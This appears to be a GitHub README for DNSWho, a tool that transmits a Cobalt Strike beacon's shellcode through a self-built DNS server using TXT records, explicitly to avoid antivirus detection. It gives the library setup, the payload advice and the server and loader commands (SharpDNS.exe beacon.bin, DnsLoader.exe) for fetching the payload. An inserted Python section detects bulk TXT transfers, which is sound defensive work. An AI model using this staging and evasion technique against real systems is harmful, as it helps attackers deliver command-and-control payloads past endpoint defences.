Transmit a CS beacon (shellcode) over a self-made DNS server to avoid AV detection

OlivierLaflamme/DNSWho

DNSWho

Implement a DNS server = SharpDNS.exe
Implement a "client" = DnsLoader.exe

Compared with HTTP, DNS offers better concealment. Analogous to the DNS beacon in CS, we can implement our own DNS server to transmit shellcode. C# has an excellent third-party library, ARSoft.Tools.Net, which we can use both for DNS queries and for building our own DNS server.

Create a new .NET 4.0 console project and install ARSoft.Tools.Net. Because of the .NET version, we need to install an older version of ARSoft.Tools.Net:
Install-Package ARSoft.Tools.Net -Version 1.8.2

Generate a raw CS payload. If you are smart, you won't make it stageless, because it will be way too big.

Then spin up the DNS server and make sure that the length shown in Wireshark is the same as the one displayed in the terminal:
SharpDNS.exe beacon.bin
The output will look like the following:

image

Then simply catch it:
DnsLoader.exe <DNS> <CDN> 2000

Note that a DNS TXT record cannot carry too much data at a time; the value of 2000 used in my test caused no problems.

Tada...
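From the defender's side, the transfer described above shows up in DNS logs as one client receiving many large TXT answers from a single server within seconds. The following is an added detection example, not part of DNSWho; the record layout, the thresholds and the sample records are assumptions constructed for illustration.

```python
from collections import defaultdict

# Constructed sample records: (epoch_seconds, client_ip, server_ip, qtype, answer_bytes).
# The layout is an assumption; map your resolver or sensor log fields onto it.
SAMPLE_LOG = (
    [(1000 + i * 30, "10.0.0.5", "10.0.0.53", "A", 60) for i in range(10)]
    + [(1005, "10.0.0.5", "10.0.0.53", "TXT", 180),    # SPF-sized answer
       (1200, "10.0.0.5", "10.0.0.53", "TXT", 1100)]   # one isolated large answer
    # Constructed burst: 30 large TXT answers to one client in about 15 seconds.
    + [(2000 + i // 2, "10.0.0.9", "203.0.113.7", "TXT", 2000) for i in range(30)]
)


def find_txt_bulk_transfers(records, window=60, large=1000, min_answers=20):
    """Flag (client, server) pairs with >= min_answers TXT answers of at least
    `large` bytes inside any `window`-second span. Thresholds are assumptions."""
    by_pair = defaultdict(list)
    for ts, client, server, qtype, size in records:
        if qtype.upper() == "TXT" and size >= large:
            by_pair[(client, server)].append((ts, size))

    alerts = []
    for (client, server), hits in sorted(by_pair.items()):
        hits.sort()
        start, total, best = 0, 0, (0, 0)  # best = (answers, bytes) of densest window
        for end, (ts, size) in enumerate(hits):
            total += size
            # Shrink the window from the left until it spans at most `window` seconds.
            while ts - hits[start][0] > window:
                total -= hits[start][1]
                start += 1
            best = max(best, (end - start + 1, total))
        if best[0] >= min_answers:
            alerts.append({"client": client, "server": server,
                           "answers": best[0], "bytes": best[1]})
    return alerts


if __name__ == "__main__":
    for alert in find_txt_bulk_transfers(SAMPLE_LOG):
        print("bulk TXT transfer:", alert)
```

Tune the thresholds against your own baseline of legitimate large TXT answers (SPF, DKIM, domain verification records) before alerting on them.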

Having Issues?

If you get the following error, this is because you're not running this on the same machine as your DNS. That is because svchost.exe listens on UDP 53.

image

Additionally, don't try to change the port for the DnsServer, because you can't:

image
